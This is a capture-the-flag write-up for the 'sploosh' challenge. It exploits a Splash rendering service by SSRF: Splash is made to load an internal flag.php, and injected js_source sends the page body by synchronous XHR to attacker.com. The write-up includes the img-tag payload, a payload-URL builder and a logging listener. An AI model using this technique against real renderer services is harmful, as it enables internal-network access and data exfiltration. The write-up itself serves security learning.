I wanted to make my own URL scraper, but parsing HTML is hard, so I used some random open source scraping project instead. http://sploosh.chal.perfect.blue/ - links to the source

When first opening the webpage, we're also given the source. Looking at that, we find that submitted URLs are passed to a Splash service, and we're then only shown the (seemingly useless and constant) geometry information. Our target is to access flag.php from either the frontend or the Splash service. So clearly, we can point Splash at our own webpage and start executing JavaScript there, potentially achieving a form of SSRF, since this runs on the Splash machine.

Now the question becomes how to circumvent the same-origin policy, so that we can read the flag and exfiltrate it to our server. When in doubt, RTFM. Rather than executing JavaScript directly on our page, we use our page to trigger a new request to Splash, and inject JavaScript into the target page through the js_source parameter. Because that script runs in the origin of the target page (the flag page), it can read the page content and send it in an AJAX request to our exfiltration listener. SOP still applies to that cross-origin request, but the browser can only check CORS after it has sent the request and received the response headers, so the requested URL, with the flag embedded in it, still shows up in our access logs even though the script can't read the response. For the AJAX request we went with synchronous XHR, because it seemed that Splash might terminate before async requests made with fetch were executed. The js_source also seemed to be cut off at the first semicolon, so we instead joined the separate expressions with commas into a single statement.
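For the listener side, anything that logs the request path is enough, including a stock web server's access log. As a rough sketch only (this is not the listener we actually used; the function names and the port in the usage note are made up for illustration), a Node.js version could look like this:

```javascript
const http = require('http');

// Recover the leaked page content from a request path such as "/pbctf%7B...%7D".
// The browser percent-encodes some characters when it builds the URL,
// so we try to decode them and fall back to the raw path on failure.
function decodeLeak(rawUrl) {
  const path = rawUrl.slice(1); // drop the leading "/"
  try {
    return decodeURIComponent(path);
  } catch (err) {
    return path; // malformed escape sequence: keep the raw text
  }
}

// Hypothetical listener: logs whatever arrives in the path and answers 204.
// No CORS headers are sent, because the request itself is all we need.
function createListener(log = console.log) {
  return http.createServer((req, res) => {
    log(decodeLeak(req.url));
    res.writeHead(204);
    res.end();
  });
}
```

Starting it would be something like createListener().listen(8000), with the port chosen arbitrarily.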

The content of the attacker page that we point the initial Splash request to:

<img src="http://splash:8050/render.json?url=http%3A//172.16.0.14/flag.php&js_source=x=new%20XMLHttpRequest(),y=x.open('GET','https%3A//attacker.com/'%2Bdocument.body.innerHTML,false),z=x.send(null)">
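The percent-encoding in that tag is easy to get wrong by hand, so here is a small sketch of how the same URL could be generated. The helper names are hypothetical, and it encodes a few more characters than our hand-written payload does (for example "/" and ","), which should decode to the same values on the Splash side:

```javascript
// Hypothetical helper: builds the render.json URL that injects the exfiltration script.
function buildRenderUrl(splashBase, targetUrl, exfilBase) {
  // Expressions are joined with commas, since js_source seemed to stop at the first semicolon.
  const js =
    "x=new XMLHttpRequest()," +
    "y=x.open('GET','" + exfilBase + "'+document.body.innerHTML,false)," + // false = synchronous
    "z=x.send(null)";
  return splashBase + "/render.json" +
    "?url=" + encodeURIComponent(targetUrl) +
    "&js_source=" + encodeURIComponent(js);
}

// Wrap the URL in an <img> tag so that loading the attacker page triggers the request.
function buildImgTag(renderUrl) {
  // Escape "&" so the URL is a valid HTML attribute value.
  return '<img src="' + renderUrl.replace(/&/g, "&amp;") + '">';
}

const renderUrl = buildRenderUrl(
  "http://splash:8050",
  "http://172.16.0.14/flag.php",
  "https://attacker.com/"
);
console.log(buildImgTag(renderUrl));
```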

Flag: pbctf{1_h0p3_y0u_us3d_lua_f0r_th1s} Nope, not at all :)